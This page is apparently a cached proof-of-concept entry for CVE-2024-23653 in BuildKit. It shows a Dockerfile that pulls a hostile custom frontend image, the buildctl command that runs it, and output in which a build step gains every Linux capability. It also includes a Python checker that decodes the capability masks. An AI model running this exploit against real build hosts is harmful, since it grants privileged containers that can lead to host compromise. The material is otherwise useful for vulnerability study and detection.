POC details: 6e5d3c5a164d484fedd9fc607728ae3ce55938f0

Source
Related vulnerability
Title: BuildKit security vulnerability (CVE-2024-23653)
Description: BuildKit is a concurrent, cache-efficient, and Dockerfile-agnostic builder toolkit. BuildKit v0.12.4 and earlier versions contain a security vulnerability. An attacker can exploit it to use the API to run containers with elevated privileges.
Introduction
```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine
RUN grep Cap /proc/self/status
```

```shell
sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
```

```
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 5.3s (6/6) FINISHED
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => [internal] load build definition from Dockerfile                                                                                                                                   0.0s
 => => transferring dockerfile: 114B                                                                                                                                                   0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          1.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => docker-image://docker.io/library/alpine:latest                                                                                                                                     4.0s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         4.0s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
% exit 99

: exit code: 99
^[[44;3R%
```

```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine as sandbox
RUN grep Cap /proc/self/status
```
```shell
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 2.8s (7/7) FINISHED
 => [internal] load build definition from Dockerfile                                                                                                                                   0.1s
 => => transferring dockerfile: 125B                                                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          2.0s
 => [auth] zdfa/evilerfile:pull token for registry-1.docker.io                                                                                                                         0.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => CACHED docker-image://docker.io/library/alpine:latest                                                                                                                              0.5s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         0.5s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine as sandbox
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
% exit 99

: exit code: 99
^[[44;3R%
```
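The two builds above differ only in the capability masks the RUN step reports: the first shows `CapEff: 000001ffffffffff`, the second `CapEff: 00000000a80425fb`. Decoding those masks is what turns the raw hex into a finding. The following Python is an added example, not part of the PoC repository or of BuildKit; it assumes the standard Linux capability numbering from `include/uapi/linux/capability.h` (bits 0 through 40) and the fact that `0xa80425fb` is the default capability set Docker grants to containers. The two status excerpts are constructed from the outputs above.

```python
"""Decode Cap* bitmasks from /proc/<pid>/status and flag an unconfined set.

Added example for CVE-2024-23653 write-up; not part of the original PoC.
"""
import re

# Capability names indexed by bit number (include/uapi/linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

CAP_FULL_MASK = (1 << len(CAP_NAMES)) - 1   # 0x1ffffffffff: every capability, bits 0..40
DOCKER_DEFAULT_MASK = 0xA80425FB            # the 14 capabilities Docker grants by default

# Constructed inputs: the Cap* lines from the two build outputs above.
UNCONFINED_STATUS = """CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
"""
DEFAULT_STATUS = """CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
"""

_CAP_LINE = re.compile(r"^(Cap(?:Inh|Prm|Eff|Bnd|Amb)):\s*([0-9a-fA-F]+)\s*$", re.M)


def parse_cap_masks(status_text):
    """Return {"CapInh": int, "CapPrm": int, ...} from /proc/<pid>/status text."""
    return {m.group(1): int(m.group(2), 16) for m in _CAP_LINE.finditer(status_text)}


def decode_caps(mask):
    """Expand a capability bitmask into the list of capability names it sets."""
    names = [CAP_NAMES[i] for i in range(len(CAP_NAMES)) if (mask >> i) & 1]
    extra = mask >> len(CAP_NAMES)          # bits newer than this table knows
    if extra:
        names.append(f"<unknown bits above {len(CAP_NAMES) - 1}: {extra:#x}>")
    return names


def classify(mask):
    """Label an effective set relative to what a default container should have."""
    if mask == CAP_FULL_MASK:
        return "full"                       # unconfined: the bug's observable symptom
    if mask == DOCKER_DEFAULT_MASK:
        return "docker-default"
    if mask & ~DOCKER_DEFAULT_MASK:
        return "elevated"                   # anything beyond the default set, e.g. CAP_SYS_ADMIN
    return "reduced"


def assess_build_step(status_text):
    """Summarise the effective capabilities a build step observed."""
    eff = parse_cap_masks(status_text).get("CapEff", 0)
    caps = decode_caps(eff)
    return {
        "effective_mask": eff,
        "effective": caps,
        "count": len(caps),
        "has_sys_admin": "CAP_SYS_ADMIN" in caps,
        "verdict": classify(eff),
    }


if __name__ == "__main__":
    for label, text in (("first build", UNCONFINED_STATUS), ("second build", DEFAULT_STATUS)):
        r = assess_build_step(text)
        print(f"{label}: verdict={r['verdict']} count={r['count']} sys_admin={r['has_sys_admin']}")
```

Run against the first output the verdict is `full` (41 capabilities, CAP_SYS_ADMIN included); against the second it is `docker-default` (14 capabilities, no CAP_SYS_ADMIN). The same `assess_build_step` can be pointed at the `/proc/self/status` of any build-step process on a host to check whether the builder is still confining steps after upgrading BuildKit.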
File snapshot

```
[4.0K] /data/pocs/6e5d3c5a164d484fedd9fc607728ae3ce55938f0
├── [4.0K] cmd
│   └── [4.0K] eviler
│       └── [3.8K] main.go
├── [ 300] Dockerfile
├── [ 122] go.mod
├── [322K] go.sum
└── [5.4K] README.md

2 directories, 5 files
```
The Shenlong bot has cached this for you.
Notes
    1. Access through the original source is recommended.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.